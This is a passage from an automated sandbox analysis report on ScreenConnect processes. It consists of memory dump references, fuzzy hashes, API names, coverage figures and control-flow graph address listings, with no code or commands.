                                                                                    • Opcode Fuzzy Hash: 48cce2b33e67c740dfb9f225ce5c84836b220f997df7429dea68117621f9819b
                                                                                    • Instruction Fuzzy Hash: 77010C6140E3C09ED7128B258894B52BFB8EF53225F1DC5DBDD888F2E7C2699849C772
                                                                                    APIs
                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 01374DBE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2952340250.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_1370000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID: `Q^q
                                                                                    • API String ID: 1889659487-1948671464
                                                                                    • Opcode ID: 3020b2753ea4a28e75ead8e10598830d2df03738bd38711214487b91c07a7cdc
                                                                                    • Instruction ID: 667049b21329d56e175e16c59cca5a8779aced83918a0ec68605ff65d42b9879
                                                                                    • Opcode Fuzzy Hash: 3020b2753ea4a28e75ead8e10598830d2df03738bd38711214487b91c07a7cdc
                                                                                    • Instruction Fuzzy Hash: 67212571901228DFEB60CF59C804B99FBB9FB04314F1085D9D50CA7290C7756A88CF92

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 15611 7ffd9b418014 15613 7ffd9b41801d 15611->15613 15612 7ffd9b418082 15613->15612 15614 7ffd9b4180f6 SetProcessMitigationPolicy 15613->15614 15615 7ffd9b418152 15614->15615
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 4a033cc4a2e46df3aa146268f5fd6d45905a58f6467ef2981126ad1ce8a2d39c
                                                                                    • Instruction ID: 68f45276b452fe5adbd57f0796f7b666f9104d863064923eb457089be1114bee
                                                                                    • Opcode Fuzzy Hash: 4a033cc4a2e46df3aa146268f5fd6d45905a58f6467ef2981126ad1ce8a2d39c
                                                                                    • Instruction Fuzzy Hash: EA821631B0EB4E4BEB799BA884746B577D2EF94340F56027AD44DC72F6DE28B9068340

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 430 7ffd9b4170ba-7ffd9b4170d9 434 7ffd9b4170ae-7ffd9b4170b9 430->434 435 7ffd9b4170db-7ffd9b4170e0 430->435 436 7ffd9b4170e2-7ffd9b417105 435->436 437 7ffd9b4170a9-7ffd9b4170ad 435->437 442 7ffd9b417153-7ffd9b41715e 436->442 443 7ffd9b417107-7ffd9b417115 436->443 437->434 445 7ffd9b417163-7ffd9b4171f6 call 7ffd9b410988 call 7ffd9b411740 call 7ffd9b4117f8 442->445 443->445 446 7ffd9b417117-7ffd9b41714e 443->446 463 7ffd9b4171f8-7ffd9b4171fa 445->463 464 7ffd9b4171fc-7ffd9b4171ff 445->464 446->442 465 7ffd9b417205-7ffd9b417214 463->465 466 7ffd9b41721e 464->466 467 7ffd9b417201-7ffd9b417202 464->467 470 7ffd9b41723d-7ffd9b417240 465->470 471 7ffd9b417216-7ffd9b417218 465->471 469 7ffd9b417223-7ffd9b417226 466->469 467->465 469->466 472 7ffd9b417228-7ffd9b417229 469->472 470->466 473 7ffd9b417242-7ffd9b417265 call 7ffd9b411948 470->473 471->469 474 7ffd9b41721a-7ffd9b41721c 471->474 475 7ffd9b41722c-7ffd9b41723b 472->475 483 7ffd9b4176f4-7ffd9b4176f9 473->483 474->475 475->470 478 7ffd9b41726a-7ffd9b41726c 475->478 481 7ffd9b41726e-7ffd9b417270 478->481 482 7ffd9b417272-7ffd9b417275 478->482 484 7ffd9b41727b-7ffd9b41728a 481->484 482->466 485 7ffd9b417277-7ffd9b417278 482->485 486 7ffd9b417a06-7ffd9b417a19 483->486 488 7ffd9b4172c5-7ffd9b4172c7 484->488 489 7ffd9b41728c-7ffd9b41728f 484->489 485->484 490 7ffd9b4172cd-7ffd9b4172d0 488->490 491 7ffd9b4172c9-7ffd9b4172cb 488->491 489->466 492 7ffd9b417291-7ffd9b417298 489->492 490->466 494 7ffd9b4172d6-7ffd9b4172d7 490->494 493 7ffd9b4172da-7ffd9b4172e9 491->493 492->466 495 7ffd9b41729a-7ffd9b4172c0 call 7ffd9b410498 492->495 498 7ffd9b41737e-7ffd9b4173b7 call 7ffd9b416ee8 493->498 499 7ffd9b4172ef-7ffd9b4172fa 493->499 494->493 495->483 512 7ffd9b4173bd-7ffd9b4173e2 call 7ffd9b416868 498->512 513 7ffd9b417522-7ffd9b417529 498->513 499->498 522 7ffd9b41742e-7ffd9b41743c 512->522 523 7ffd9b4173e4-7ffd9b417401 512->523 514 7ffd9b41752f-7ffd9b417540 513->514 515 7ffd9b41775b-7ffd9b41775e 513->515 524 7ffd9b4177ad-7ffd9b4177b8 514->524 525 7ffd9b417546-7ffd9b417549 514->525 515->466 517 7ffd9b417764-7ffd9b417765 515->517 521 7ffd9b417767-7ffd9b417769 517->521 526 7ffd9b41776d-7ffd9b417770 521->526 522->513 533 7ffd9b417752-7ffd9b41775a 523->533 534 7ffd9b417407-7ffd9b41742c 523->534 524->521 535 7ffd9b4177ba-7ffd9b4177c7 524->535 525->526 527 7ffd9b41754f-7ffd9b41755d 525->527 526->466 528 7ffd9b417776-7ffd9b417777 526->528 528->524 533->515 534->522 536 7ffd9b4177cd-7ffd9b4177d0 535->536 537 7ffd9b4177c9-7ffd9b4177cb 535->537 536->466 540 7ffd9b4177d6-7ffd9b4177d7 536->540 539 7ffd9b4177da-7ffd9b4177e0 537->539 543 7ffd9b4177e2-7ffd9b417803 call 7ffd9b416550 call 7ffd9b416658 call 7ffd9b416690 539->543 544 7ffd9b417808-7ffd9b417830 539->544 540->539 556 7ffd9b41789c-7ffd9b4178a1 543->556 549 7ffd9b417841 544->549 550 7ffd9b417832-7ffd9b41783f 544->550 552 7ffd9b417843-7ffd9b41784b 549->552 550->552 555 7ffd9b41784d-7ffd9b417895 call 7ffd9b4160f8 call 7ffd9b411d18 552->555 552->556 555->556 558 7ffd9b4178a3-7ffd9b4178c2 call 7ffd9b4160f8 call 7ffd9b411d00 556->558 559 7ffd9b4178c9-7ffd9b4178d0 556->559 558->559 563 7ffd9b4178d6-7ffd9b4178df 559->563 564 7ffd9b417707-7ffd9b41771f 559->564 568 7ffd9b4178e1-7ffd9b4178e5 563->568 569 7ffd9b417928-7ffd9b41792a 563->569 575 7ffd9b417724-7ffd9b417751 564->575 568->569 570 7ffd9b4178e7-7ffd9b417925 call 7ffd9b411630 568->570 571 7ffd9b417930-7ffd9b417987 call 7ffd9b4105c8 569->571 572 7ffd9b4175bc-7ffd9b4175bf 569->572 570->569 601 7ffd9b4179f2-7ffd9b4179f7 571->601 602 7ffd9b417989-7ffd9b417991 571->602 572->483 578 7ffd9b4175c5-7ffd9b41763a call 7ffd9b411d48 call 7ffd9b4116c8 572->578 575->533 620 7ffd9b41769f-7ffd9b4176df call 7ffd9b413e50 call 7ffd9b414da8 578->620 621 7ffd9b41763c-7ffd9b417676 call 7ffd9b4116c8 578->621 601->572 602->601 604 7ffd9b417993-7ffd9b41799e 602->604 607 7ffd9b4179a0-7ffd9b4179bd 604->607 608 7ffd9b4179ea-7ffd9b4179ed call 7ffd9b4105f8 604->608 613 7ffd9b4176fe-7ffd9b417706 607->613 614 7ffd9b4179c3-7ffd9b4179e8 607->614 608->601 613->564 614->608 620->575 633 7ffd9b4176e1-7ffd9b4176ed 620->633 636 7ffd9b4179fc-7ffd9b417a01 call 7ffd9b413740 621->636 637 7ffd9b41767c-7ffd9b41768e call 7ffd9b413750 call 7ffd9b413a08 621->637 633->483 635 7ffd9b4176ef call 7ffd9b416f08 633->635 635->483 636->486 643 7ffd9b417693-7ffd9b41769a call 7ffd9b4139f8 637->643 643->620
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: L\s
                                                                                    • API String ID: 0-3972157774
                                                                                    • Opcode ID: ab67455759a2cf5df2b90cc0a056831bf621f255417b223f321ff12b6fb09ac5
                                                                                    • Instruction ID: 4d732246cca836f246aed09b720d343cbf17de33c0fcdd72b407e718f594c912
                                                                                    • Opcode Fuzzy Hash: ab67455759a2cf5df2b90cc0a056831bf621f255417b223f321ff12b6fb09ac5
                                                                                    • Instruction Fuzzy Hash: 8F327B61F1EA4E0BF778AB6C84756B923D2EFA4318F11117AD05DC31E7DD28BD429241
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 736c320f5b070c5d9658d82354f6fefbafc1234df1e180d7f8580be5080b4759
                                                                                    • Instruction ID: ce87b0802e036b37c78196efc2e494f60f069dcb97f5f81025ce488b4b5e8bda
                                                                                    • Opcode Fuzzy Hash: 736c320f5b070c5d9658d82354f6fefbafc1234df1e180d7f8580be5080b4759
                                                                                    • Instruction Fuzzy Hash: D3F1FA31F0EB4F4AEB7997A844716B976D2EF94344F56027AD44DC72F6DE28FA018240
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 968aa5e0e262ca7cd40f82dbb5e5b44454af2759318c88c4fada7cb1e4b0c7df
                                                                                    • Instruction ID: 3ef09b40c8f5369190c798347d0e558bbac56a75cd33076d4e9148605b423955
                                                                                    • Opcode Fuzzy Hash: 968aa5e0e262ca7cd40f82dbb5e5b44454af2759318c88c4fada7cb1e4b0c7df
                                                                                    • Instruction Fuzzy Hash: EFE1D731F0EB4F4BEB7997A884706B936D2EF94344F55427AD04DC32F6DE28BA429240

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1245 7ffd9b726809-7ffd9b72680f 1246 7ffd9b726880-7ffd9b726892 1245->1246 1247 7ffd9b726811-7ffd9b726814 1245->1247 1250 7ffd9b726895-7ffd9b72689c 1246->1250 1249 7ffd9b726816-7ffd9b726858 call 7ffd9b7259d8 call 7ffd9b7259e8 call 7ffd9b725810 1247->1249 1247->1250 1264 7ffd9b7268c3-7ffd9b7268d7 1249->1264 1271 7ffd9b72685a 1249->1271 1251 7ffd9b72689d-7ffd9b7268bf 1250->1251 1252 7ffd9b7269d8-7ffd9b726a0a 1250->1252 1251->1264 1265 7ffd9b7269a7-7ffd9b7269d7 1252->1265 1266 7ffd9b726a0c-7ffd9b726a1c 1252->1266 1264->1252 1265->1252 1272 7ffd9b726a1e-7ffd9b726a3a 1266->1272 1273 7ffd9b726a66-7ffd9b726a6c 1266->1273 1271->1246 1275 7ffd9b726a40-7ffd9b726a5e call 7ffd9b720c30 * 2 1272->1275 1276 7ffd9b726e48-7ffd9b726e66 call 7ffd9b720c30 * 2 1272->1276 1278 7ffd9b726a73-7ffd9b726a76 1273->1278 1293 7ffd9b726cde-7ffd9b726cfc call 7ffd9b720c30 * 2 1275->1293 1294 7ffd9b726a64-7ffd9b726a65 1275->1294 1295 7ffd9b726f72-7ffd9b726f7d 1276->1295 1296 7ffd9b726e6c-7ffd9b726e73 1276->1296 1282 7ffd9b726a78-7ffd9b726a7a 1278->1282 1283 7ffd9b726a7c-7ffd9b726a8a 1278->1283 1286 7ffd9b726a8d-7ffd9b726aa2 1282->1286 1283->1286 1301 7ffd9b726aa4-7ffd9b726aa6 1286->1301 1302 7ffd9b726aa8-7ffd9b726acc call 7ffd9b725b18 * 2 1286->1302 1322 7ffd9b726cfe-7ffd9b726d08 1293->1322 1323 7ffd9b726d26-7ffd9b726d44 call 7ffd9b720c30 * 2 1293->1323 1294->1273 1299 7ffd9b726e86-7ffd9b726e88 1296->1299 1300 7ffd9b726e75-7ffd9b726e84 1296->1300 1305 7ffd9b726e8f-7ffd9b726eb3 1299->1305 1300->1299 1315 7ffd9b726e8a 1300->1315 1306 7ffd9b726acf-7ffd9b726ae4 1301->1306 1302->1306 1324 7ffd9b726eff-7ffd9b726f15 1305->1324 1325 7ffd9b726eb5-7ffd9b726ed2 1305->1325 1320 7ffd9b726ae6-7ffd9b726ae8 1306->1320 1321 7ffd9b726aea-7ffd9b726b0e call 7ffd9b725b18 * 2 1306->1321 1315->1305 1327 7ffd9b726b11-7ffd9b726b26 1320->1327 1321->1327 1329 7ffd9b726d0a-7ffd9b726d1a 1322->1329 1330 7ffd9b726d1c 1322->1330 1351 7ffd9b726d4a-7ffd9b726d55 1323->1351 1352 7ffd9b726dfb-7ffd9b726e06 1323->1352 1334 7ffd9b726f7e-7ffd9b726f96 1325->1334 1335 7ffd9b726ed8-7ffd9b726efd 1325->1335 1348 7ffd9b726b28-7ffd9b726b2a 1327->1348 1349 7ffd9b726b2c-7ffd9b726b43 call 7ffd9b725b18 1327->1349 1338 7ffd9b726d1e-7ffd9b726d1f 1329->1338 1330->1338 1354 7ffd9b726fd7-7ffd9b726fd8 1334->1354 1335->1324 1338->1323 1355 7ffd9b726b53-7ffd9b726b61 1348->1355 1349->1355 1369 7ffd9b726d57-7ffd9b726d59 1351->1369 1370 7ffd9b726d5b-7ffd9b726d6a 1351->1370 1371 7ffd9b726e08-7ffd9b726e0a 1352->1371 1372 7ffd9b726e0c-7ffd9b726e1b 1352->1372 1357 7ffd9b727020-7ffd9b727031 1354->1357 1358 7ffd9b726fda-7ffd9b726ff7 1354->1358 1367 7ffd9b726b63-7ffd9b726b65 1355->1367 1368 7ffd9b726b67-7ffd9b726b75 1355->1368 1373 7ffd9b726fce-7ffd9b726fd6 1357->1373 1374 7ffd9b727033-7ffd9b72703d 1357->1374 1365 7ffd9b727040-7ffd9b727096 1358->1365 1366 7ffd9b726ff9-7ffd9b72701e 1358->1366 1397 7ffd9b727098-7ffd9b727099 1365->1397 1398 7ffd9b72709c-7ffd9b7270c0 1365->1398 1366->1357 1375 7ffd9b726b78-7ffd9b726b79 1367->1375 1368->1375 1376 7ffd9b726d6d-7ffd9b726db1 1369->1376 1370->1376 1377 7ffd9b726e1e-7ffd9b726e20 1371->1377 1372->1377 1373->1354 1374->1365 1389 7ffd9b726b80-7ffd9b726b81 1375->1389 1390 7ffd9b726dc4-7ffd9b726dcc 1376->1390 1391 7ffd9b726db3-7ffd9b726dbb 1376->1391 1377->1295 1385 7ffd9b726e26-7ffd9b726e38 1377->1385 1385->1276 1400 7ffd9b726b88-7ffd9b726b8f 1389->1400 1393 7ffd9b726dcd-7ffd9b726dce 1390->1393 1395 7ffd9b726dde-7ffd9b726df8 1390->1395 1391->1393 1394 7ffd9b726dbd-7ffd9b726dc2 1391->1394 1396 7ffd9b726dd3-7ffd9b726ddd call 7ffd9b725b50 1393->1396 1394->1396 1395->1352 1396->1395 1397->1398 1410 7ffd9b7270f2-7ffd9b7270fb 1398->1410 1411 7ffd9b7270c2-7ffd9b7270d1 1398->1411 1400->1293 1403 7ffd9b726b95-7ffd9b726b9c 1400->1403 1403->1293 1407 7ffd9b726ba2-7ffd9b726bb9 1403->1407 1412 7ffd9b726bee-7ffd9b726bf9 1407->1412 1413 7ffd9b726bbb-7ffd9b726bcd 1407->1413 1414 7ffd9b7270d3-7ffd9b7270d4 1411->1414 1415 7ffd9b7270d7-7ffd9b7270f1 1411->1415 1421 7ffd9b726bff-7ffd9b726c0e 1412->1421 1422 7ffd9b726bfb-7ffd9b726bfd 1412->1422 1419 7ffd9b726bcf-7ffd9b726bd1 1413->1419 1420 7ffd9b726bd3-7ffd9b726be1 1413->1420 1414->1415 1423 7ffd9b726be4-7ffd9b726be7 1419->1423 1420->1423 1425 7ffd9b726c11-7ffd9b726c13 1421->1425 1422->1425 1423->1412 1427 7ffd9b726cc8-7ffd9b726cd8 1425->1427 1428 7ffd9b726c19-7ffd9b726c30 1425->1428 1427->1293 1428->1427 1432 7ffd9b726c36-7ffd9b726c53 1428->1432 1435 7ffd9b726c5f 1432->1435 1436 7ffd9b726c55-7ffd9b726c5d 1432->1436 1437 7ffd9b726c61-7ffd9b726c63 1435->1437 1436->1437 1437->1427 1438 7ffd9b726c65-7ffd9b726c6f 1437->1438 1440 7ffd9b726c7d-7ffd9b726c85 1438->1440 1441 7ffd9b726c71-7ffd9b726c7b call 7ffd9b723d00 1438->1441 1443 7ffd9b726cb3-7ffd9b726cc6 call 7ffd9b725b40 1440->1443 1444 7ffd9b726c87-7ffd9b726cac call 7ffd9b725928 1440->1444 1441->1293 1441->1440 1443->1293 1444->1443
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H
                                                                                    • API String ID: 0-2852464175
                                                                                    • Opcode ID: 688ff2a22f7592579144fb92a01f15adbfb05a0ebe37bcb837e9646fc8d35e3c
                                                                                    • Instruction ID: 04f865f1e9234c4df46ca4cc89f0d77596b36374e83518bd650583fe13e8e1db
                                                                                    • Opcode Fuzzy Hash: 688ff2a22f7592579144fb92a01f15adbfb05a0ebe37bcb837e9646fc8d35e3c
                                                                                    • Instruction Fuzzy Hash: 72D1B631F1AB4F4AEB79A7A444706B976E1EF94344F16027AD04DC72F2DE28FA458340

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1938 7ffd9b421f32-7ffd9b421f49 1941 7ffd9b421f70-7ffd9b443f52 1938->1941 1942 7ffd9b421f4b-7ffd9b421f6f 1938->1942 1956 7ffd9b443ff3-7ffd9b444002 1941->1956 1957 7ffd9b443f58-7ffd9b443f8d 1941->1957 1942->1941 1959 7ffd9b444010-7ffd9b444025 1957->1959 1960 7ffd9b443f93-7ffd9b443f9d 1957->1960 1966 7ffd9b444027 1959->1966 1967 7ffd9b444029-7ffd9b444067 1959->1967 1960->1956 1961 7ffd9b443f9f-7ffd9b443fa6 1960->1961 1961->1959 1962 7ffd9b443fa8-7ffd9b443fb7 1961->1962 1964 7ffd9b443fe1-7ffd9b443fe8 1962->1964 1965 7ffd9b443fb9-7ffd9b443fdf 1962->1965 1964->1959 1969 7ffd9b443fea-7ffd9b443ff1 1964->1969 1965->1964 1973 7ffd9b444003-7ffd9b44400f 1965->1973 1966->1967 1970 7ffd9b444069-7ffd9b4440b0 1966->1970 1967->1970 1969->1956 1969->1961 1976 7ffd9b4440b2-7ffd9b4440b7 call 7ffd9b422020 1970->1976 1977 7ffd9b4440bc-7ffd9b4440f8 1970->1977 1976->1977 1980 7ffd9b4440fe-7ffd9b444107 1977->1980 1981 7ffd9b4442f4-7ffd9b444309 1977->1981 1982 7ffd9b44417b-7ffd9b444180 1980->1982 1983 7ffd9b444109-7ffd9b444110 1980->1983 1989 7ffd9b444313-7ffd9b44435e 1981->1989 1990 7ffd9b44430b-7ffd9b444312 1981->1990 1986 7ffd9b4441f2-7ffd9b4441fc 1982->1986 1987 7ffd9b444182-7ffd9b44418e 1982->1987 1983->1981 1985 7ffd9b444116-7ffd9b44412f 1983->1985 1993 7ffd9b444131-7ffd9b444157 1985->1993 1994 7ffd9b444159-7ffd9b444167 1985->1994 1991 7ffd9b44421e-7ffd9b444226 1986->1991 1992 7ffd9b4441fe-7ffd9b44420b call 7ffd9b422040 1986->1992 1987->1981 1988 7ffd9b444194-7ffd9b4441a7 1987->1988 1995 7ffd9b444229-7ffd9b444234 1988->1995 2015 7ffd9b444360-7ffd9b444366 1989->2015 2016 7ffd9b44437b-7ffd9b44438c 1989->2016 1990->1989 1991->1995 2010 7ffd9b444210-7ffd9b44421c 1992->2010 1993->1994 2001 7ffd9b4441ac-7ffd9b4441af 1993->2001 1994->1981 1998 7ffd9b44416d-7ffd9b444179 1994->1998 1995->1981 1999 7ffd9b44423a-7ffd9b444255 1995->1999 1998->1982 1998->1983 1999->1981 2002 7ffd9b44425b-7ffd9b44426f 1999->2002 2003 7ffd9b4441b1 2001->2003 2004 7ffd9b4441bb-7ffd9b4441c6 2001->2004 2002->1981 2007 7ffd9b444275-7ffd9b444286 2002->2007 2003->2004 2004->1981 2008 7ffd9b4441cc-7ffd9b4441f1 2004->2008 2007->1981 2014 7ffd9b444288-7ffd9b444297 2007->2014 2010->1991 2017 7ffd9b4442e2-7ffd9b4442f3 2014->2017 2018 7ffd9b444299-7ffd9b4442a4 2014->2018 2019 7ffd9b4443c1-7ffd9b44441a 2015->2019 2020 7ffd9b444368-7ffd9b444379 2015->2020 2021 7ffd9b44438e-7ffd9b444399 2016->2021 2022 7ffd9b44439d-7ffd9b4443c0 2016->2022 2018->2017 2027 7ffd9b4442a6-7ffd9b4442dd call 7ffd9b422040 2018->2027 2033 7ffd9b44442e-7ffd9b44443f 2019->2033 2034 7ffd9b44441c-7ffd9b44442c 2019->2034 2020->2015 2020->2016 2027->2017 2036 7ffd9b444450-7ffd9b444481 2033->2036 2037 7ffd9b444441-7ffd9b44444f 2033->2037 2034->2033 2034->2034 2043 7ffd9b444483-7ffd9b444489 2036->2043 2044 7ffd9b4444d8-7ffd9b4444df 2036->2044 2037->2036 2043->2044 2047 7ffd9b44448b-7ffd9b44448c 2043->2047 2045 7ffd9b444520-7ffd9b444549 2044->2045 2046 7ffd9b4444e1-7ffd9b4444e2 2044->2046 2048 7ffd9b4444e5-7ffd9b4444e8 2046->2048 2049 7ffd9b44448f-7ffd9b444492 2047->2049 2050 7ffd9b44454a-7ffd9b44455d 2048->2050 2051 7ffd9b4444ea-7ffd9b4444fb 2048->2051 2049->2050 2053 7ffd9b444498-7ffd9b4444a8 2049->2053 2062 7ffd9b44455f-7ffd9b444566 2050->2062 2063 7ffd9b444567-7ffd9b444577 2050->2063 2054 7ffd9b4444fd-7ffd9b444503 2051->2054 2055 7ffd9b444517-7ffd9b44451e 2051->2055 2056 7ffd9b4444d1-7ffd9b4444d6 2053->2056 2057 7ffd9b4444aa-7ffd9b4444cd 2053->2057 2054->2050 2058 7ffd9b444505-7ffd9b444513 2054->2058 2055->2045 2055->2048 2056->2044 2056->2049 2057->2056 2058->2055 2062->2063
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ffd5f2a0828abfd8e47079571212386c384d9642791430f38e52619c91a92b96
                                                                                    • Instruction ID: a14b12dd37cdbe87275e19ebf57dc36598d8c48e85f1eb2b5c3221a8fa95ca64
                                                                                    • Opcode Fuzzy Hash: ffd5f2a0828abfd8e47079571212386c384d9642791430f38e52619c91a92b96
                                                                                    • Instruction Fuzzy Hash: D1428631B1DA4A4FE329EB6894615B1B7E1FF41318B1546BEC09FC71A7DE24B8528780

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2190 7ffd9b726283-7ffd9b72628e 2191 7ffd9b726331-7ffd9b726337 2190->2191 2192 7ffd9b726294-7ffd9b7262ac 2190->2192 2193 7ffd9b72698e-7ffd9b7269a1 2191->2193 2194 7ffd9b72633d-7ffd9b726345 2191->2194 2192->2191 2199 7ffd9b7262b2-7ffd9b7262e4 2192->2199 2196 7ffd9b72638d-7ffd9b726395 2194->2196 2197 7ffd9b726347-7ffd9b726386 2194->2197 2196->2193 2198 7ffd9b72639b-7ffd9b72655c 2196->2198 2197->2196 2235 7ffd9b726563-7ffd9b7265fa 2198->2235 2199->2191 2239 7ffd9b726600-7ffd9b726601 2235->2239 2240 7ffd9b7265fc-7ffd9b7265fe 2235->2240 2241 7ffd9b726608-7ffd9b726615 2239->2241 2240->2241 2242 7ffd9b726617-7ffd9b72662f 2241->2242 2243 7ffd9b72664b 2241->2243 2251 7ffd9b72664d 2242->2251 2252 7ffd9b726631-7ffd9b726646 2242->2252 2244 7ffd9b72664f-7ffd9b726652 2243->2244 2245 7ffd9b726654-7ffd9b726661 2244->2245 2246 7ffd9b726665-7ffd9b726668 2244->2246 2245->2246 2253 7ffd9b726663 2245->2253 2249 7ffd9b726672-7ffd9b72669b 2246->2249 2250 7ffd9b72666a-7ffd9b72666b 2246->2250 2258 7ffd9b7266a2-7ffd9b726739 2249->2258 2250->2249 2251->2244 2252->2235 2253->2246 2263 7ffd9b72673f-7ffd9b726740 2258->2263 2264 7ffd9b72673b-7ffd9b72673d 2258->2264 2265 7ffd9b726747-7ffd9b726754 2263->2265 2264->2265 2266 7ffd9b726756-7ffd9b72676e 2265->2266 2267 7ffd9b72678a 2265->2267 2272 7ffd9b726770-7ffd9b726785 2266->2272 2273 7ffd9b72678c 2266->2273 2268 7ffd9b72678e-7ffd9b726791 2267->2268 2270 7ffd9b7267a4-7ffd9b7267a7 2268->2270 2271 7ffd9b726793-7ffd9b7267a0 2268->2271 2275 7ffd9b7267b1-7ffd9b7267d2 2270->2275 2276 7ffd9b7267a9-7ffd9b7267aa 2270->2276 2271->2270 2277 7ffd9b7267a2 2271->2277 2272->2258 2273->2268 2281 7ffd9b7267d4-7ffd9b7267f4 call 7ffd9b725800 2275->2281 2282 7ffd9b7267f8-7ffd9b726804 2275->2282 2276->2275 2277->2270 2281->2282 2282->2193
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2984563696.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b720000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8c8c8647c0165c3a24bb1ffb9f3490d55c483bab7ba6a75ff9fea761de82c803
                                                                                    • Instruction ID: 6bf141c366e47bf0ab2eb7354c771fd55cdd46e65c11eb489645444780e5f912
                                                                                    • Opcode Fuzzy Hash: 8c8c8647c0165c3a24bb1ffb9f3490d55c483bab7ba6a75ff9fea761de82c803
                                                                                    • Instruction Fuzzy Hash: F902B371B1DB4A4FEBA8EB288465A7573E1FFA8300F01457EE44EC32B6DE24E9418741

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2973911873.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b410000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: MitigationPolicyProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1088084561-0
                                                                                    • Opcode ID: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                                    • Instruction ID: 8814354eb268e044d2c4550dd507c647ccc7541b7a5639f78e8758f4612157e3
                                                                                    • Opcode Fuzzy Hash: a881bc39b8613701678b3faa1e0cc88647291f7001010518ee51a4391c12c3ad
                                                                                    • Instruction Fuzzy Hash: 66514B31D1DB4D4FDB289FA89C4A5E97BE0EF65310F04017FE489C3192DE68A846C792

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
